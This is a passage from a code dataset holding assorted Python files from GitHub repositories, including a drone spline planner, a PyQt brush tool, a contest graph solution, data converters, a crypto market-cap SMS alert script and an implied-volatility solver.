\n # default a1 and a3 is 0\n if t1 is None:\n t1 = 0.5 * direct12\n if t3 is None:\n t3 = 0.5 * direct23\n if a1 is None:\n a1 = np.array([0, 0, 0], dtype=np.float)\n if a3 is None:\n a3 = np.array([0, 0, 0], dtype=np.float)\n \n norm_12 = np.linalg.norm(direct12)\n norm_23 = np.linalg.norm(direct23)\n t2 = direct12 / norm_12\n\n axis = np.cross(direct12, direct23)\n axis /= np.linalg.norm(axis)\n angle = np.arccos(np.dot(direct12, direct23) / (norm_12 * norm_23)) / 2\n # by Rodrigues' rotation formula\n t2 = np.cos(angle) * t2 + np.sin(angle) * np.cross(axis, t2) + (1 - np.cos(angle)) * np.dot(axis, t2) * axis\n t2 *= (min(norm_12, norm_23))\n # see Sprunk[2008] ch4.1.2 for reference\n alpha = norm_23 / (norm_12 + norm_23)\n beta = norm_12 / (norm_12 + norm_23)\n a2 = alpha * (6 * p1 + 2 * t1 + 4 * t2 - 6 * p2) + beta * (-6 * p2 - 4 * t2 - 2 * t3 + 6 * p3)\n\n return [QuinticSpline(p1, p2, t1, t2, a1, a2),\n QuinticSpline(p2, p3, t2, t3, a2, a3)]\n\ndef sample_path(path, ds = 0.1, samples_per_seg = 300):\n # type: (List[QuinticSpline], float, int) -> List[object]\n num_seg = len(path)\n t = np.linspace(0, 1, samples_per_seg)\n samples = []\n for i in range(num_seg):\n for x in t:\n samples.append((x + i, path[i].evaluate_with_derivatives(x)))\n # perform numeric integral to the the approximated curve length\n last_t, (pt, d1, d2) = samples[0]\n last_d1_norm = np.linalg.norm(d1)\n last_s = 0\n \n result = []\n result.append(((0, 0), (pt, d1, d2)))\n\n s = 0\n for t, (pt, d1, d2) in samples[1:]:\n print(s)\n d1_norm = np.linalg.norm(d1)\n s += (0.5 * (d1_norm + last_d1_norm) * (t - last_t))\n last_d1_norm = d1_norm\n last_t = t\n\n if s - last_s >= ds:\n last_s = s\n result.append(((s, t), (pt, d1, d2)))\n\n return result\n\nif __name__ == '__main__':\n points = np.array([\n [18.0, -23.0, 5.3],\n [18.15111, 3.631447, 6.3064975],\n [16.749825, 39.56997, 6.7624995],\n [2.32982075, 27.86797, 2.54649985],\n [2.199832, 9.001728, 1.99375],\n [-7.308671, -12.13678, 3.229941],\n [-7.61018, -28.472035, 2.6425],\n [-9.0005400e-03, -3.3913000e+01, 2.1031115e+00],\n [5.8678205, -28.440035, 2.56749995],\n [7.249821, -11.79203, 2.54649985],\n [-9.32867, 7.773174, 2.019941],\n [-9.148669, 30.62316, 2.897941]\n ])\n s1, s2 = propose_geometric_spline_path(points[0], points[1], points[2])\n fig = plt.figure()\n ax = Axes3D(fig)\n plot_spline(s1, ax, c='r')\n plot_spline(s2, ax, c='g')\n ax.plot(points[:3, 0], points[:3, 1], points[:3, 2], c='b')\n ax.scatter3D(points[0][0], points[0][1], points[0][2], marker='x')\n ax.scatter3D(points[1][0], points[1][1], points[1][2], marker='x') \n ax.scatter3D(points[2][0], points[2][1], points[2][2], marker='x')\n waypoints = sample_path((s1, s2), 1)\n\n xs = []\n ys = []\n zs = []\n for (_,_), (pt,_,_) in waypoints:\n xs.append(pt[0])\n ys.append(pt[1])\n zs.append(pt[2])\n ax.scatter3D(xs, ys, zs, marker='o', c='orange')\n plt.show()\n","repo_name":"Veilkrand/drone_race","sub_path":"spline_planner/scripts/planner_test.py","file_name":"planner_test.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"34473132278","text":"import math\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\n\nclass Brush:\n\n DRAW_MODES = {\n \"add\": QPainter.CompositionMode_SourceOver,\n \"replace\": QPainter.CompositionMode_Source,\n \"multiply\": QPainter.CompositionMode_Multiply,\n \"light(soft)\": QPainter.CompositionMode_SoftLight,\n \"light(hard)\": 
QPainter.CompositionMode_HardLight,\n #\"lighten\": QPainter.CompositionMode_Lighten,\n #\"darken\": QPainter.CompositionMode_Lighten,\n \"difference\": QPainter.CompositionMode_Difference,\n }\n\n DRAW_TOOLS = {\n \"fill\",\n \"swipe\",\n }\n\n def __init__(self):\n self.mode = \"select\"\n self.fill_tolerance = 0\n self._radius = 2\n self._color = QColor(255, 255, 255)\n self._alpha = 255\n self._brush = None\n self._brush_qimage = None\n\n @property\n def radius(self):\n return self._radius\n\n @property\n def color(self):\n return self._color\n\n @property\n def alpha(self):\n return self._alpha\n\n def is_brush(self):\n return self.mode in self.DRAW_MODES\n\n def is_draw_tool(self):\n return self.mode in self.DRAW_MODES or self.mode in self.DRAW_TOOLS\n\n def set_radius(self, r):\n self._radius = int(r)\n self._brush_qimage = None\n\n def set_mode(self, m):\n self.mode = m\n\n def set_color(self, c):\n self._color = c\n self._brush_qimage = None\n\n def set_alpha(self, a):\n self._alpha = max(0, min(255, a))\n self._brush_qimage = None\n\n def set_fill_tolerance(self, t):\n self.fill_tolerance = t\n\n def draw(self, pos, qimage, clip_rect=None):\n assert self.mode in self.DRAW_MODES\n\n r = self._radius - .5\n center = pos - QPointF(r, r)\n p = QPainter(qimage)\n if clip_rect is not None:\n p.setClipRect(clip_rect)\n p.setCompositionMode(self.DRAW_MODES[self.mode])\n\n p.drawImage(center, self.brush_image)\n\n def swipe(self, pos1, pos2, qimage, clip_rect=None):\n src = QImage(self.radius*2+1, self.radius*2+1, QImage.Format_RGBA8888)\n cx = src.width() / 2 - .5\n cy = src.height() / 2 - .5\n srcx = pos1.x() - self.radius\n srcy = pos1.y() - self.radius\n alpha = self.alpha / 255.\n for y in range(src.height()):\n sy = max(0, min(qimage.height()-1, srcy + y))\n if clip_rect is not None:\n if sy < clip_rect.top():\n sy = clip_rect.top()\n if sy > clip_rect.bottom():\n sy = clip_rect.bottom()\n for x in range(src.width()):\n sx = max(0, min(qimage.width()-1, srcx + x))\n if clip_rect is not None:\n if sx < clip_rect.left():\n sx = clip_rect.left()\n if sx > clip_rect.right():\n sx = clip_rect.right()\n dx, dy = cx-x, cy-y\n d = math.sqrt(dx*dx + dy*dy)\n col = QColor(qimage.pixel(sx, sy))\n col.setAlphaF(alpha * max(0., 1. 
- d / self.radius) * col.alphaF())\n src.setPixel(x, y, col.rgba())\n\n r = self._radius\n center = pos2 - QPointF(r, r)\n\n p = QPainter(qimage)\n if clip_rect is not None:\n p.setClipRect(clip_rect)\n\n p.drawImage(center, src)\n\n def flood_fill(self, pos, qimage, clip_rect=None):\n orgpix = qimage.pixelColor(pos)\n orgpix = (orgpix.red(), orgpix.green(), orgpix.blue())\n todo = {(pos.x(), pos.y())}\n visited = set()\n\n def _check(p):\n if p in visited:\n return False\n c = qimage.pixelColor(p[0], p[1])\n d = (abs(orgpix[0] - c.red()) + abs(orgpix[1] - c.green()) + abs(orgpix[2] - c.blue())) / 3\n return d <= self.fill_tolerance\n\n while todo:\n pos = todo.pop()\n visited.add(pos)\n if pos[0] + 1 < qimage.width():\n if clip_rect is None or pos[0] + 1 <= clip_rect.right():\n p = (pos[0]+1, pos[1])\n if _check(p):\n todo.add(p)\n if pos[1] + 1 < qimage.height():\n if clip_rect is None or pos[1] + 1 <= clip_rect.bottom():\n p = (pos[0], pos[1]+1)\n if _check(p):\n todo.add(p)\n if pos[0] - 1 >= 0:\n if clip_rect is None or pos[0] - 1 >= clip_rect.left():\n p = (pos[0]-1, pos[1])\n if _check(p):\n todo.add(p)\n if pos[1] - 1 >= 0:\n if clip_rect is None or pos[1] - 1 >= clip_rect.top():\n p = (pos[0], pos[1]-1)\n if _check(p):\n todo.add(p)\n\n for p in visited:\n qimage.setPixel(p[0], p[1], self.color.rgba())\n\n @property\n def brush_image(self):\n if self._brush_qimage is None:\n self._brush_qimage = self._create_brush_qimage(self._color)\n return self._brush_qimage\n\n def _create_brush_qimage(self, color):\n image = QImage((self._radius-1)*2+1, (self._radius-1)*2+1, QImage.Format_RGBA8888)\n cx = image.width() / 2 - .5\n cy = image.height() / 2 - .5\n alpha = self.alpha / 255.\n for y in range(image.height()):\n for x in range(image.width()):\n dx, dy = cx-x, cy-y\n d = math.sqrt(dx*dx + dy*dy)\n col = QColor(color)\n col.setAlphaF(alpha * max(0., 1.- d / self.radius) * col.alphaF())\n image.setPixel(x, y, col.rgba())\n return image","repo_name":"defgsus/thegame","sub_path":"lib/editor/tileset/Brush.py","file_name":"Brush.py","file_ext":"py","file_size_in_byte":5735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7304853198","text":"# 악덕 영주 혜유 [Gold 2]\nimport sys\nimport heapq as hq\nI = sys.stdin.readline\n\nn,m = map(int,I().split())\nroutes = []\nresult = 0\nfarthest = 0\n\nfor _ in range(m):\n a,b,c = map(int,I().split())\n routes.append((a,b,c))\n\n\nroutes.sort(key=lambda x:x[2])\ngraph = [[]for _ in range(n)]\nparent = [i for i in range(n)]\n\n\ndef find(parent,x):\n if x != parent[x]:\n parent[x] = find(parent,parent[x])\n return parent[x]\n\ndef union(parent,a,b):\n a = find(parent,a)\n b = find(parent,b)\n if a < b:\n parent[b] = a\n else:\n parent[a] = b\n\ndef da(s):\n distance = [int(1e10)]*n\n distance[s] = 0\n q = []\n hq.heappush(q,(0,s))\n while q:\n dist, now = hq.heappop(q)\n if distance[now] < dist:\n continue\n\n for i in graph[now]:\n cost = dist+i[1]\n\n if distance[i[0]] > cost:\n distance[i[0]] = cost\n hq.heappush(q,(cost,i[0]))\n\n return distance\n\nfor a,b,cost in routes:\n if find(parent,a) != find(parent,b):\n union(parent,a,b)\n graph[a].append((b,cost))\n graph[b].append((a,cost))\n result += cost\n\n\nfor i in range(n):\n farthest = 
max(farthest,max(da(i)))\n\nprint(result)\nprint(farthest)","repo_name":"dlwhd990/BOJ-2022","sub_path":"BOJ/[20010]악덕영주혜유.py","file_name":"[20010]악덕영주혜유.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12719495021","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Aug 25 10:08:12 2021\r\n\r\n@author: THMEI4\r\n\"\"\"\r\n\r\n#%%\r\nimport glob\r\nimport xmltodict as xml\r\nimport pandas as pd\r\nimport os\r\nimport re\r\n\r\n#%%Input needed\r\n#Place all files per group/material in 1 folde\r\nSource = 'Here the directory of where the folder with .dl1 files is'\r\nFolder = 'Folder name of .dl1 files here'\r\nNameoutput=Folder\r\n\r\nArrangedata=0 #Highest peak at 1 side\r\nMeanoutput=1 #Give mean profile as output\r\nMeanfrommiddle=0 #Give mean profile with \"centered\" data\r\nHeaderoutput=1 #give header as output\r\n\r\nInputfolder=Source+Folder+'/'\r\n#%%Arrange data\r\nFolders = os.listdir(Inputfolder)\r\ndef myround(x, base=0.05):\r\n return base * round(x/base)\r\n\r\ndf=[]\r\nheader=[]\r\nfor i in Folders:\r\n \r\n for filename in glob.glob(os.path.join(Inputfolder+i, '*.dl1')):\r\n with open(os.path.join(os.getcwd(), filename), 'r') as f: # open in readonly mode\r\n raw_data = xml.parse(f.read())\r\n data = pd.DataFrame(raw_data['DensityProfil']['Profile'])\r\n head= raw_data['DensityProfil']['Header']\r\n head=pd.DataFrame(head, columns=head.keys(),index=[0])\r\n head=head.iloc[: , :5]\r\n #head['Hour']=int(re.sub(\"[^0-9]\", \"\", Folder))\r\n head['sample']=filename.replace(Inputfolder+i[0],'')\r\n head['Type']=filename.replace(Inputfolder,'')[:filename.replace(Inputfolder,'').find('\\\\')]\r\n head['File']=filename\r\n #data['Hour']=int(re.sub(\"[^0-9]\", \"\", Folder))\r\n data['sample']=filename.replace(Inputfolder+i[0],'')\r\n data['Type']=filename.replace(Inputfolder,'')[:filename.replace(Inputfolder,'').find('\\\\')]\r\n data['File']=filename\r\n half=(data['x-Value'].astype(float).max()*0.5)\r\n Yperc=min(data['x-Value'].astype(float), key=lambda x:abs(x-half))\r\n data['Xcenter']=data['x-Value'].astype(float)-Yperc\r\n header.append(head)\r\n df.append(data)\r\ndf = pd.concat(df)\r\nheader=pd.concat(header)\r\ndf['x-Value']=df['x-Value'].astype(float)\r\ndf['y-Value']=df['y-Value'].astype(float)\r\ndf = df.rename(columns={'x-Value': 'X', 'y-Value': 'Y'})\r\n\r\n\r\ndf['Xround']=myround(df['X'])\r\ndf['XroundC']=myround(df['Xcenter'])\r\n\r\n#%%Putting high peak first\r\n\r\nif Arrangedata==1:\r\n average=[]\r\n\r\n compoundData = df.groupby(['File'])\r\n fitData = []\r\n for name,group in compoundData:\r\n File= name\r\n curfit=dict(zip(['File'],[File]))\r\n curfit['Peakleft']=group.Y[group.X<=(group.X.max()*0.5)].max()\r\n curfit['Peakright']=group.Y[group.X>=(group.X.max()*0.5)].max()\r\n curfit['Peakmax']=max(group.Y[group.X<=(group.X.max()*0.5)].max(),group.Y[group.X>(group.X.max()*0.5)].max())\r\n curfit['Thickness']=group.X.max()\r\n fitData.append(curfit)\r\n fitCompound = [ item['File'] for item in fitData]\r\n fitData=pd.DataFrame(fitData)\r\n fitData\r\n\r\n dfarranged = pd.merge(df,\r\n fitData,\r\n on ='File',\r\n how ='inner')\r\n dfarranged['X_left']=myround(dfarranged['X'][dfarranged['Peakleft']==dfarranged['Peakmax']])\r\n dfarranged['X_right']=myround((dfarranged['X'][dfarranged['Peakright']==dfarranged['Peakmax']]-dfarranged['Thickness'][dfarranged['Peakright']==dfarranged['Peakmax']])*-1)\r\n 
dfarranged['X_x']=dfarranged['X_right'].combine_first(dfarranged['X_left'])\r\n dfarranged=dfarranged[['Type','Hour','File', 'X','X_x','Y']].copy()\r\n dfarranged = dfarranged.rename(columns={'X':'Xoriginal','X_x': 'Xround'})\r\n \r\n outputlocation=Inputfolder+\"/\"+Nameoutput+\"arranged.xlsx\"\r\n writer = pd.ExcelWriter(outputlocation, engine='xlsxwriter')\r\n df.to_excel(writer, sheet_name='Sheet1')\r\n writer.save()\r\n\r\n#%%Calculating mean curve\r\nif Meanoutput==1:\r\n y=df.groupby(['Type'])\r\n\r\n Mean=[]\r\n for i in y:\r\n Meanprofile=i[1].groupby(['Xround'])['Y'].mean()\r\n Meanprofile=pd.DataFrame(Meanprofile)\r\n Meanprofile=Meanprofile.reset_index()\r\n Meanprofile.rename(columns={ Meanprofile.columns[1]: \"Y\" }, inplace = True)\r\n Meanprofile['Type']=i[0]\r\n #Meanprofile['Hour']=i[1]['Hour'].mean()\r\n xmin=max(df.groupby(['File'])['Xround'].min())\r\n xmax=min(df.groupby(['File'])['Xround'].max())\r\n #Meanprofile=Meanprofile[(Meanprofile['Xround']>=xmin ) & (Meanprofile['Xround']<=xmax)]\r\n Meanprofile['Folder']=Folder\r\n Mean.append(Meanprofile)\r\n Meanprofile=pd.concat(Mean,axis=0)\r\n if Meanfrommiddle==1:\r\n y=df.groupby(['Type'])\r\n\r\n Mean=[]\r\n for i in y:\r\n Meanprofile=i[1].groupby(['XroundC'])['Y'].mean()\r\n Meanmin=i[1].groupby(['File'])['XroundC'].min().mean()\r\n Meanmax=i[1].groupby(['File'])['XroundC'].max().mean()\r\n Meanprofile=pd.DataFrame(Meanprofile)\r\n Meanprofile=Meanprofile.reset_index()\r\n Meanprofile.rename(columns={ Meanprofile.columns[1]: \"Y\" }, inplace = True)\r\n Meanprofile['Type']=i[0]\r\n #Meanprofile['Hour']=i[1]['Hour'].mean()\r\n xmin=max(df.groupby(['File'])['XroundC'].min())\r\n xmax=min(df.groupby(['File'])['XroundC'].max())\r\n #Meanprofile=Meanprofile[(Meanprofile['Xround']>=xmin ) & (Meanprofile['Xround']<=xmax)]\r\n Meanprofile['Folder']=Folder\r\n Meanprofile=Meanprofile[(Meanprofile['XroundC']<=Meanmax)&(Meanprofile['XroundC']>=Meanmin)]\r\n Mean.append(Meanprofile)\r\n Meanprofile=pd.concat(Mean,axis=0)\r\n \r\n outputlocation=Inputfolder+\"/\"+Nameoutput+\"mean.xlsx\"\r\n writer = pd.ExcelWriter(outputlocation, engine='xlsxwriter')\r\n Meanprofile.to_excel(writer, sheet_name='Sheet1')\r\n writer.save()\r\n\r\n#%%Output\r\noutputlocation=Inputfolder+\"/\"+Nameoutput+\".xlsx\"\r\nwriter = pd.ExcelWriter(outputlocation, engine='xlsxwriter')\r\ndf.to_excel(writer, sheet_name='Sheet1')\r\nwriter.save()\r\n\r\n\r\nif Headeroutput==1:\r\n outputlocation=Inputfolder+\"/\"+Nameoutput+\"Header.xlsx\"\r\n writer = pd.ExcelWriter(outputlocation, engine='xlsxwriter')\r\n header.to_excel(writer, sheet_name='Sheet1')\r\n writer.save()","repo_name":"thmeijerink/Density-profile-processor","sub_path":"Densityprofiledl1reader.py","file_name":"Densityprofiledl1reader.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18869276267","text":"import pytest\nfrom autodiffcc.ADmath import *\nfrom autodiffcc.core import AD\nfrom autodiffcc.parser import expressioncc\n\ndef test_log():\n fn = expressioncc('3 * log(x,2) + sin(7)', ['x']).get_fn()\n t1 = fn(AD(4, n_vars=1))\n assert t1.val == pytest.approx(6.6569866)\n assert t1.der == pytest.approx(1.08202128)\n\ndef test_equation():\n fn = expressioncc('3 * log(x,2) = - sin(7)', ['x']).get_fn()\n t1 = fn(AD(4, n_vars=1))\n assert t1.val == pytest.approx(6.6569866)\n assert t1.der == pytest.approx(1.08202128) \n\ndef test_multi_var():\n fn = expressioncc('log(x,2) + sin(y)', ['x', 
'y']).get_fn()\n x = AD(4, der = [1, 0])\n y = AD(3, der = [0, 1])\n t1 = fn(x,y)\n assert t1.val == pytest.approx(2.1411200080598674)\n assert t1.der.tolist() == [pytest.approx(0.36067376), pytest.approx(-0.9899925)] ","repo_name":"Crimson-Computing/cs207-FinalProject","sub_path":"build/lib/tests/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"31158116161","text":"import codecs\nimport pandas as pd\nimport cv2\nimport os\nimport math\nimport html\nfrom flask import Flask,render_template,url_for\n\nfrom pandas.core import frame\n\npd.set_option('colheader_justify', 'center')\n\n\n\n#####\nframeRateList = [60,30,24]\nfile_url = input(\"EDL file path---> \")\n\nif os.path.exists(file_url):\n pass\nelse:\n print(\"FILE DOES NOT EXIST!\")\n exit()\n\nvideoPath = input(\"VIDEO file path---> \")\n\nif os.path.exists(videoPath):\n pass\nelse:\n print(\"FILE DOES NOT EXIST!\")\n exit()\n\nfolderPath = os.path.dirname(videoPath)\nin_frameRate = input('FrameRate?---> ')\nframeRate = int(round(float((in_frameRate))))\nif frameRate in frameRateList:\n pass\nelse:\n print(\"INVALID FRAME RATE!\")\n exit()\n\n\nprjName = input('Enter Project Name--->')\n\nhtml_string = '''\n\n CUTSHEET\n \n \n {table}\n \n.\n'''\ndef TCtoFrame(frameRate,time):\n frameNum = 0\n sepTime = time.split(\":\")\n frameNum = (frameRate * 60 * int(sepTime[1])) +(frameRate*int(sepTime[2])) + int(sepTime[3])\n return frameNum\n\ndef EDLParser(edl_file,frameRate):\n #空のデータフレームを作成\n df = pd.DataFrame({\n 'THUMBNAIL':[],\n 'FILE_NAME':[],\n 'IN_TIME':[],\n 'OUT_TIME':[],\n 'IN_FRAME':[],\n 'OUT_FRAME':[]})\n\n f = codecs.open(edl_file,'r','shift-jis','ignore')\n lines = f.read().split('\\n') #改行コードでParse\n for i, line in enumerate(lines):\n if i == 0:\n previous_line = None\n else:\n previous_line = lines[i - 1]\n\n if i == len(lines) -1:\n next_item = None\n else:\n next_item = lines[i + 1]\n try:\n if lines[i].split()[2] in \"V\": #ビデオレイヤのデータのみ抽出\n thumbnail_path = None\n file_name = next_item.split(\":\")[1].strip(\"\\r\") #ファイル名\n in_time = lines[i].split()[6]\n out_time = lines[i].split()[7]\n in_frame = TCtoFrame(frameRate,in_time)\n out_frame = TCtoFrame(frameRate,out_time)\n addRow = pd.DataFrame([thumbnail_path,file_name,in_time,out_time,in_frame,out_frame],index=df.columns).T\n df = df.append(addRow,ignore_index=True)\n except IndexError as e:\n pass\n return df\n\ndef saveFrame(videoPath, frame_num, result_path):\n cap = cv2.VideoCapture(videoPath)\n \n if not cap.isOpened():\n return\n os.makedirs(os.path.dirname(result_path),exist_ok=True)\n\n cap.set(cv2.CAP_PROP_POS_FRAMES, frame_num)\n ret, frame = cap.read()\n\n if ret:\n cv2.imwrite(result_path,frame)\n\n\ndef executeSaveFrame(dataFrame):\n for i in range(len(dataFrame)):\n result_path = f'{folderPath}/image/{prjName}_{str(i).zfill(4)}.jpg'\n dataFrame.iat[i,0] = f''\n frame_num = math.floor((dataFrame.iloc[i,4]+dataFrame.iloc[i,5])*0.5)\n saveFrame(videoPath,frame_num,result_path)\n\ndf = EDLParser(file_url,frameRate)\nexecuteSaveFrame(df)\n# print(df)\n\nwith open(f'{folderPath}/myhtml.html', 'w') as f:\n f.write(html_string.format(table=df.to_html(classes='mystyle',escape=False)))\n 
print(\"----DONE----\")\n","repo_name":"UKYOINABA/EDL-to-HTML","sub_path":"EDLtoHTML.py","file_name":"EDLtoHTML.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9269866009","text":"# -*- coding: utf-8 -*-\n\nimport sys, os\n\n\n# -- General configuration -----------------------------------------------------\n\n\n# Add any Sphinx extension module names here, as strings. They can be extensions\n# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.\nextensions = ['sphinx.ext.todo']\n\n# The suffix of source filenames.\nsource_suffix = '.rst'\n\n# The encoding of source files.\n#source_encoding = 'utf-8-sig'\n\n# The master toctree document.\nmaster_doc = 'index'\n\n# General information about the project.\nproject = u'breaking-deps'\ncopyright = u'2015, Povilas Balciunas'\n\n# The version info for the project you're documenting, acts as replacement for\n# |version| and |release|, also used in various other places throughout the\n# built documents.\n#\n# The short X.Y version.\nversion = '0.1.0'\n# The full version, including alpha/beta/rc tags.\nrelease = '0.1.0'\n\n\n# -- Options for manual page output --------------------------------------------\n\n# One entry per manual page. List of tuples\n# (source start file, name, description, authors, manual section).\nman_pages = [\n ('index', 'breaking-deps',\n u'dependency breaking techniques from the book '\n '\"Working effectively with legacy code\" by Michael C. Feathers.',\n [u'Povilas Balciunas'], 1)\n]\n","repo_name":"povilasb/breaking-dependencies-man","sub_path":"src/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36492437268","text":"from pycoingecko import CoinGeckoAPI\nimport numpy as np\nimport pandas as pd\nimport json\nfrom datetime import datetime, timedelta\nimport time\nimport csv\nimport sys\n\nfrom twilio.rest import Client\n\naccount_sid = ''\nauth_token = ''\nfrom_tel = '+12223334444'\nto_tel = '+12223334444'\n\n\nwith open('auth.csv', mode='r') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n account_sid = csv_reader.fieldnames[0]\n auth_token = csv_reader.fieldnames[1]\n from_tel = csv_reader.fieldnames[2]\n to_tel = csv_reader.fieldnames[3]\n\ntwilio_client = Client(account_sid, auth_token)\n \n\nfilter_file = 'filter.csv'\n\nif len(sys.argv) > 1:\n filter_file = sys.argv[1]\n\nfilter = []\nwith open(filter_file, mode='r') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n for entry in csv_reader.fieldnames:\n filter.append(entry)\n\ncg = CoinGeckoAPI()\n\nmcap_recent_snapshot = {}\n\n#populate an initial mcap snapshot\nmarkets_snapshot = cg.get_coins_markets(vs_currency='usd', order=\"market_cap_desc\", per_page=250, page=1)\nmarkets_snapshot += cg.get_coins_markets(vs_currency='usd', order=\"market_cap_desc\", per_page=250, page=2)\nfor entry in markets_snapshot:\n mcap_recent_snapshot[entry['symbol']] = entry['market_cap_rank']\n\niteration = 0\nwhile True:\n print(iteration)\n time.sleep(60*15)\n\n markets_snapshot = cg.get_coins_markets(vs_currency='usd', order=\"market_cap_desc\", per_page=250, page=1)\n markets_snapshot += cg.get_coins_markets(vs_currency='usd', order=\"market_cap_desc\", per_page=250, page=2)\n\n sms_alert_msg = \"\"\n\n for entry in markets_snapshot:\n try:\n if mcap_recent_snapshot[entry['symbol']] != entry['market_cap_rank']:\n if 
entry['symbol'] in filter:\n sms_alert_msg += f\"\\n{entry['symbol']} {mcap_recent_snapshot[entry['symbol']]} -> {entry['market_cap_rank']}\"\n except KeyError:\n print (entry['symbol'])\n mcap_recent_snapshot[entry['symbol']] = entry['market_cap_rank']\n \n if sms_alert_msg != \"\":\n print(sms_alert_msg)\n twilio_client.messages .create(\n body = f\"!!!MCAP ALERT!!!\\n{sms_alert_msg}\",\n from_ = from_tel,\n to = to_tel)\n \n iteration += 1\n \nprint('done')","repo_name":"antoineMica/CoinGeckoPuller","sub_path":"MCapAlert.py","file_name":"MCapAlert.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37042717119","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 29 19:26:06 2018\n\n@author: songqsh\n\"\"\"\n\n\nfrom scipy import optimize\nimport BsmOption as BO\n\ndef IVol(Option, MarketPrice):\n \"\"\"\n Inputs:\n ======= \n Option: BO.BsmEuOptions class\n MarketPrice: float, price quoted from market\n Outputs:\n ========\n float,\n Implied volatility\n \"\"\"\n InitVol = .3\n error = lambda vol: (Option.BsmPrice(vol) - MarketPrice)**2\n opt = optimize.fmin(error, InitVol, disp = False);\n return opt[0]\n\n\n \nif __name__ == \"__main__\":\n iOpt = BO.BsmEuOptions(\\\n Spot = 290.68, Strike = 288, Rate = 0.02, \\\n Vol = 0.3, Maturity = 1/12, Type = 'Call'\\\n )\n MarketPrice = 9.23\n print('Implied Volatility is', IVol(iOpt, MarketPrice))","repo_name":"shuyueliu/MA6628_Homework","sub_path":"IVol.py","file_name":"IVol.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70975458185","text":"import sys\nsys.path.append(\"../..\")\nsys.path.append(\"../../functions\")\nsys.path.append(\"../game_states\")\nsys.path.append(\"../ddm_dice\")\nsys.path.append(\"../dungeon_objects\")\nimport settings\nfrom logger import Logger\nfrom dice_list import DiceList\nfrom dice_pool import DicePool\n\nprint(\"Welcome to the dice pool test.\\n\\n\\\nHere you can fill a dice pool with dice from a library, and\\n\\\ndisplay the results.\")\n\nprint(\"\\n\\\nInput dl to display the library.\\n\\\nInput dl to display a dice from the library.\\n\\\nInput dp to display the dice pool.\\n\\\nInput dp to display a dice from the dice pool.\\n\\\nInput a to add a dice from the library to the pool.\\n\\\nInput r to remove a dice from the pool.\\n\\\nInput f to fill the dice pool with random dice.\\n\\\nInput q to quit.\\n\")\n\nlog = Logger()\nlibrary = DiceList(\"library\", log)\nsettings.library_path = (\"../../databases/library.yaml\")\nlibrary.fill_from_library()\npool = DicePool(log)\n\ndef get_dicenum(string):\n try:\n return int(string)\n except ValueError:\n print(\"Couldn't interpret the dice number.\\n\")\n return None\n\nwhile True:\n command = input(\">\")\n \n if command == \"q\":\n break\n \n # display something\n if command[0] == \"d\":\n if len(command) <= 1: # special case of invalid cmd\n print(\"\\n\")\n continue\n if command[1] == \"l\": # display library\n set = library \n elif command[1] == \"p\": # display pool\n set = pool\n else: # skip\n continue\n if len(command) == 2: # print the whole set\n print(set.stringify() + \"\\n\")\n\n else: # print a specific dice\n dicenum = get_dicenum(command[2:])\n if not dicenum: \n continue\n dice = set.get(dicenum)\n if dice:\n print(dice.stringify() + \"\\n\")\n else:\n print(set.log.flush())\n\n # add dice to pool\n 
elif command[0] == \"a\":\n # get dice number from command\n dicenum = get_dicenum(command[1:])\n if dicenum is None: \n continue\n\n # get dice from library\n dice = library.get_copy(dicenum)\n if not dice:\n print(library.log.flush())\n continue\n\n # add dice to pool\n success = pool.add(dice)\n if success:\n print(\"Dice added to pool.\\n\")\n else:\n print(pool.log.flush())\n \n # remove dice from dice pool\n elif command[0] == \"r\":\n # get dice number from command\n dicenum = get_dicenum(command[1:])\n if dicenum is None: \n continue\n\n # remove dice from pool\n dice = pool.remove_idx(dicenum)\n if dice:\n print(\"Dice removed to pool.\\n\")\n else:\n print(pool.log.flush())\n\n # fill with random dice\n elif command == \"f\":\n pool.fill_random()\n print(\"Dice pool filled.\\n\")\n\nprint(\"Bye!\")\n","repo_name":"francocurotto/YDDM-re-old","sub_path":"source/game_logic/ddm_list/test_dice_pool.py","file_name":"test_dice_pool.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37091893099","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import minimize\nfrom scipy.stats import bernoulli\nfrom scipy.stats import ortho_group # Requires version 0.18 of scipy\nfrom copy import deepcopy\nfrom matplotlib import rc\nfrom sklearn.metrics import r2_score\nfrom sklearn.linear_model import Lasso,Ridge, LinearRegression,orthogonal_mp,Lars\nfrom scipy.linalg import orth\nfrom scipy.interpolate import interp1d\nfrom scipy import interpolate\nfrom sklearn.decomposition import SparsePCA\n\nfrom sklearn.cluster import KMeans\n\ndef warn(*args, **kwargs):\n pass\nimport warnings\nwarnings.warn = warn\n\n#################### Factorization Functions ######################\n\n#norm = 'envs', 'loci', 'mods_W', 'mods_M'\n#method_M = 'Lasso', 